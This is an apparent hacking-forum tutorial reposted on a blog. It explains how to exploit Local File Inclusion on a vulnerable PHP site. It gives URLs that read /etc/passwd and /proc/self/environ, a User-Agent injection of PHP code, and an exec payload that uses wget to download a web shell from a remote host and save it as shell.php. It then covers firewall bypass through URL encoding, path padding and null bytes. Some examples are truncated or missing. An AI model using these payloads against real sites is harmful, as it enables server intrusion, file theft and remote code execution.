Local File Inclusion
Requirments
- Vuln site.
- Tamper data. - https://addons.mozilla.org/sv-se/firefox...mper-data/
- HackBar - https://addons.mozilla.org/en-us/firefox/addon/hackbar/
First of all, check if the site got a vulnerabillity against
Quote:etc/passwdTo do that.
Quote:http://www.site.com/index.php?filename=2Change the number '2' to
Quote:etc/passwdand it will look like this:
Quote:http://www.site.com/index.php?filename=etc/passwdIf it works, it will pop up some type of a code.
It will look like this
Spoiler (Click to View)
Do the same but change to 'Etc/passwd' to
Quote:/proc/self/environ
If it works and the file exist, you'll get something similar but not the same code.
Let's open temper data. To do that press F10 and do as I did here.
![[Image: 3cc30c8dcfa268c457726ec0ec417f93.png]](http://gyazo.com/3cc30c8dcfa268c457726ec0ec417f93.png)
Now when you have temper data up, it would look similar to this.
Spoiler (Click to View)
Click the button 'Start temper' In the top left corner.
![[Image: 853ba2956894a57438d3b8c1dffe0698.png]](http://gyazo.com/853ba2956894a57438d3b8c1dffe0698.png)
When the Tamper is done, you would see a window like this.
![[Image: 76fce75d5c9b019cab1f21f7f7993bba.png]](http://gyazo.com/76fce75d5c9b019cab1f21f7f7993bba.png)
Change your 'User-Agent' to
Quote:<?php phpinfo();?>Now refresh your site.
And this is how it would look like.
Spoiler (Click to View)
Now let us upload out shell.
Start up the Tamper-Data, then click star tamper and go to the 'User-Agent' again.
Type this into the 'User agent field'
Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
The site will now download your shell. You can locate the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php
And you would locate your uploaded shell.
.
WAF aka Web Application Firewalls.
- Vuln site.
- Tamper Data; https://addons.mozilla.org/sv-se/firefox...mper-data/
- Hackbar; https://addons.mozilla.org/en-us/firefox/addon/hackbar/
Today, I'll show you how to bypass a Web applications firewall.
First of all, check if the site got a vulnerabillity against LFI.
In order to do that, change your old vector /etc/passwd to %2fetc%2fpasswd.
Your whole URL aka 'Uniform Resource Locator' would look like this.
Quote:BeggfomercyIsanoob.com/index.php?filename=%2fetc%2fpasswd.
So basicly every '/' will be changed to'%2f' without quotes.
(/=%2f) That's a pretty eazy form to remember, keep that in mind.
This method is called 'URL Encoding.', It can be some kind of algorithm.
As the name says, it will encode the URL and bypass the filters if you got the luck with you.
To bypass the characther limit, you can just do it like this.
Quote:/../etc/passwd/./././././././././././././././././././././././././././././Much more, It depends on the web server.
Null Bytes, this method is pretty eazy and can be really usefull.
Add this to the end of your URL.
Quote:
For exemple.
Quote: .com/index.php?filename=/etc/passwd.You can even add nullbytes instead. This will help you to get around the firewalls, but does'nt always work.
This is just a few methods, it exist so much more. I might cover that in another tutorial.
This does not cover everything, It's just the basics within WAF bypassing, It might of been an error in the tutorial
If so please report it to me.
0 (mga) komento:
Mag-post ng isang Komento